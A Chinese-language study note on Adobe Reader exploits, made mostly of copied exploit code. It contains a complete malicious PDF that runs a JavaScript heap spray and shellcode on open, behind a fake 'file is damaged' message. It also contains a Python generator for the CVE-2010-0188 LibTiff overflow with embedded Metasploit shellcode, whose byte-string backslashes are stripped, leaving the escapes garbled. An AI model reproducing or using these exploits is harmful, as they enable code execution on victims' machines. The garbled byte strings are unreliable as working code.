PDF 学习

学习来自于：  exploit-db

1）

首先 ADOBE Reader    AdbeRdr90_zh_CN   9.0

需要注意的是    OD调试时 选择不忽略异常（要不然就直接跑掉，就不叫调试了）

编写好POC OD调试

发现  需要构造特殊字符

接着可以看到  0xc0xc0xc0xc 被  shellcode 覆盖   执行了  shellcode

%PDF-1.1

1 0 obj
<<
 /Type /Catalog
 /Outlines 2 0 R
 /Pages 3 0 R
 /OpenAction 7 0 R
>>
endobj

2 0 obj
<<
 /Type /Outlines
 /Count 0
>>
endobj

3 0 obj
<<
 /Type /Pages
 /Kids [4 0 R]
 /Count 1
>>
endobj

4 0 obj
<<
 /Type /Page
 /Parent 3 0 R
 /MediaBox [0 0 612 792]
 /Contents 5 0 R
 /Resources <<
             /ProcSet [/PDF /Text]
             /Font << /F1 6 0 R >>
            >>
>>
endobj

5 0 obj
<< /Length 98 >>
stream
BT /F1 12 Tf 100 700 Td 15 TL (Open File Error!  Maybe the file is damaged!
) Tj ET
endstream
endobj

6 0 obj
<<
 /Type /Font
 /Subtype /Type1
 /Name /F1
 /BaseFont /Helvetica
 /Encoding /MacRomanEncoding
>>
endobj

7 0 obj
<<
 /Type /Action
 /S /JavaScript
 /JS (

var shellcode=unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063");

var nops = unescape("%u9090%u9090");
while (nops.length < 0x100000) 
nops += nops;
  nops=nops.substring(0,0x100000/2-32/2-4/2-2/2-shellcode.length);
  nops=nops+shellcode;
  var memory = new Array();
  for (var i=0;i<200;i++) 
memory[i] += nops;
var str = unescape("%0c%0c%0c%0c");
while(str.length < 0x6000)
  str += str;
app.doc.Collab.getIcon(str+'aaaaD.a');

)
>>
endobj

xref
0 8
0000000000 65535 f 
0000000010 00000 n 
0000000098 00000 n 
0000000147 00000 n 
0000000208 00000 n 
0000000400 00000 n 
0000000549 00000 n 
0000000663 00000 n 
trailer
<<
 /Size 8
 /Root 1 0 R
>>
startxref
1946
%%EOF

2）

 ADOBE Reader 

 Version tested:
 9.3.2
 9.3.1

Adobe Systems Incorporated 直接崩溃

其中他的 c++代码  可以设置项目  不报waring 要不然很慢

http://www.exploit-db.com/exploits/14121/

3）

Version: <=8.3.0, <=9.3.0

__doc__='''
 
Title: Adobe PDF LibTiff Integer Overflow Code Execution.
Product: Adobe Acrobat Reader
Version: <=8.3.0, <=9.3.0
CVE: 2010-0188
Author: villy (villys777 at gmail.com)
Site: http://bugix-security.blogspot.com/
Tested : succesfully tested on Adobe Reader 9.1/9.2/9.3 OS Windows XP(SP2,SP3)
------------------------------------------------------------------------
'''
import sys
import base64
import struct
import zlib
import StringIO
 
SHELLCODE_OFFSET = 0x555
TIFF_OFSET=0x2038
 
# windows/exec - 227 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe
buf ="xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C"
buf +="x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53"
buf +="x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B"
buf +="x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95"
buf +="xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59"
buf +="x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A"
buf +="xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75"
buf +="xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03"
buf +="x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB"
buf +="x53"
buf +="x68x64x61x30x23"
buf +="x68x23x50x61x6E"
buf +="x8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8"
 
class CVE20100188Exploit:
    def __init__(self,shellcode):
        self.shellcode = shellcode
        self.tiff64 = base64.b64encode(self.gen_tiff())
 
    def gen_tiff(self):
        tiff =  'x49x49x2ax00'
        tiff += struct.pack("<L", TIFF_OFSET)
 
        tiff += 'x90' * (SHELLCODE_OFFSET)
        tiff += self.shellcode
        tiff += 'x90' * (TIFF_OFSET - 8 - len(buf) - SHELLCODE_OFFSET)
 
        tiff += "x07x00x00x01x03x00x01x00"
        tiff += "x00x00x30x20x00x00x01x01x03x00x01x00x00x00x01x00"
        tiff += "x00x00x03x01x03x00x01x00x00x00x01x00x00x00x06x01"
        tiff += "x03x00x01x00x00x00x01x00x00x00x11x01x04x00x01x00"
        tiff += "x00x00x08x00x00x00x17x01x04x00x01x00x00x00x30x20"
        tiff += "x00x00x50x01x03x00xCCx00x00x00x92x20x00x00x00x00"
        tiff += "x00x00x00x0Cx0Cx08x24x01x01x00xF7x72x00x07x04x01"
        tiff += "x01x00xBBx15x00x07x00x10x00x00x4Dx15x00x07xBBx15"
        tiff += "x00x07x00x03xFEx7FxB2x7Fx00x07xBBx15x00x07x11x00"
        tiff += "x01x00xACxA8x00x07xBBx15x00x07x00x01x01x00xACxA8"
        tiff += "x00x07xF7x72x00x07x11x00x01x00xE2x52x00x07x54x5C"
        tiff += "x00x07xFFxFFxFFxFFx00x01x01x00x00x00x00x00x04x01"
        tiff += "x01x00x00x10x00x00x40x00x00x00x31xD7x00x07xBBx15"
        tiff += "x00x07x5Ax52x6Ax02x4Dx15x00x07x22xA7x00x07xBBx15"
        tiff += "x00x07x58xCDx2Ex3Cx4Dx15x00x07x22xA7x00x07xBBx15"
        tiff += "x00x07x05x5Ax74xF4x4Dx15x00x07x22xA7x00x07xBBx15"
        tiff += "x00x07xB8x49x49x2Ax4Dx15x00x07x22xA7x00x07xBBx15"
        tiff += "x00x07x00x8BxFAxAFx4Dx15x00x07x22xA7x00x07xBBx15"
        tiff += "x00x07x75xEAx87xFEx4Dx15x00x07x22xA7x00x07xBBx15"
        tiff += "x00x07xEBx0Ax5FxB9x4Dx15x00x07x22xA7x00x07xBBx15"
        tiff += "x00x07xE0x03x00x00x4Dx15x00x07x22xA7x00x07xBBx15"
        tiff += "x00x07xF3xA5xEBx09x4Dx15x00x07x22xA7x00x07xBBx15"
        tiff += "x00x07xE8xF1xFFxFFx4Dx15x00x07x22xA7x00x07xBBx15"
        tiff += "x00x07xFFx90x90x90x4Dx15x00x07x22xA7x00x07xBBx15"
        tiff += "x00x07xFFxFFxFFx90x4Dx15x00x07x31xD7x00x07x2Fx11"
        tiff += "x00x07"
        return tiff
     
 
    def gen_xml(self):
        xml= '''<?xml version="1.0" encoding="UTF-8" ?> 
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/1.0/">
<present>
<pdf>
<version>1.65</version> 
<interactive>1</interactive> 
<linearized>1</linearized> 
</pdf>
<xdp>
<packets>*</packets> 
</xdp>
<destination>pdf</destination> 
</present>
</config>
<template baseProfile="interactiveForms" xmlns="http://www.xfa.org/schema/xfa-template/2.4/">
<subform name="topmostSubform" layout="tb" locale="en_US">
<pageSet>
<pageArea id="PageArea1" name="PageArea1">
<contentArea name="ContentArea1" x="0pt" y="0pt" w="612pt" h="792pt" /> 
<medium short="612pt" long="792pt" stock="custom" /> 
</pageArea>
</pageSet>
<subform name="Page1" x="0pt" y="0pt" w="612pt" h="792pt">
<break before="pageArea" beforeTarget="#PageArea1" /> 
<bind match="none" /> 
<field name="ImageField1" w="28.575mm" h="1.39mm" x="37.883mm" y="29.25mm">
<ui>
<imageEdit /> 
</ui>
</field>
<?templateDesigner expand 1?> 
</subform>
<?templateDesigner expand 1?> 
</subform>
<?templateDesigner FormTargetVersion 24?> 
<?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?> 
<?templateDesigner Zoom 94?> 
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data>
<topmostSubform>
<ImageField1 xfa:contentType="image/tif" href="">'''+self.tiff64 +'''</ImageField1> 
</topmostSubform>
</xfa:data>
</xfa:datasets>
<PDFSecurity xmlns="http://ns.adobe.com/xtd/" print="1" printHighQuality="1" change="1" modifyAnnots="1" formFieldFilling="1" documentAssembly="1" contentCopy="1" accessibleContent="1" metadata="1" /> 
<form checksum="a5Mpguasoj4WsTUtgpdudlf4qd4=" xmlns="http://www.xfa.org/schema/xfa-form/2.8/">
<subform name="topmostSubform">
<instanceManager name="_Page1" /> 
<subform name="Page1">
<field name="ImageField1" /> 
</subform>
<pageSet>
<pageArea name="PageArea1" /> 
</pageSet>
</subform>
</form>
</xdp:xdp>
 
'''
        return xml
 
    def gen_pdf(self):
        xml = zlib.compress(self.gen_xml())
        pdf='''%PDF-1.6
1 0 obj 
<</Filter /FlateDecode/Length ''' + str(len(xml)) + '''/Type /EmbeddedFile>>
stream
''' + xml+'''
endstream 
endobj 
2 0 obj 
<</V () /Kids [3 0 R] /T (topmostSubform[0]) >>
endobj 
3 0 obj 
<</Parent 2 0 R /Kids [4 0 R] /T (Page1[0])>>
endobj 
4 0 obj 
<</MK <</IF <</A [0.0 1.0]>>/TP 1>>/P 5 0 R/FT /Btn/TU (ImageField1)/Ff 65536/Parent 3 0 R/F 4/DA (/CourierStd 10 Tf 0 g)/Subtype /Widget/Type /Annot/T (ImageField1[0])/Rect [107.385 705.147 188.385 709.087]>>
endobj 
5 0 obj 
<</Rotate 0 /CropBox [0.0 0.0 612.0 792.0]/MediaBox [0.0 0.0 612.0 792.0]/Resources <</XObject >>/Parent 6 0 R/Type /Page/PieceInfo null>>
endobj 
6 0 obj 
<</Kids [5 0 R]/Type /Pages/Count 1>>
endobj 
7 0 obj 
<</PageMode /UseAttachments/Pages 6 0 R/MarkInfo <</Marked true>>/Lang (en-us)/AcroForm 8 0 R/Type /Catalog>>
endobj 
8 0 obj 
<</DA (/Helv 0 Tf 0 g )/XFA [(template) 1 0 R]/Fields [2 0 R]>>
endobj xref
trailer
<</Root 7 0 R/Size 9>>
startxref
14765
%%EOF'''
        return pdf
 
 
if __name__=="__main__":
    print __doc__
    if len(sys.argv) != 2:
        print "Usage: %s [output.pdf]" % sys.argv[0]
    print "Creating Exploit to %s
"% sys.argv[1]
    exploit=CVE20100188Exploit(buf)
    f = open(sys.argv[1],mode='wb')
    f.write(exploit.gen_pdf())
    f.close()
    print "[+] done !"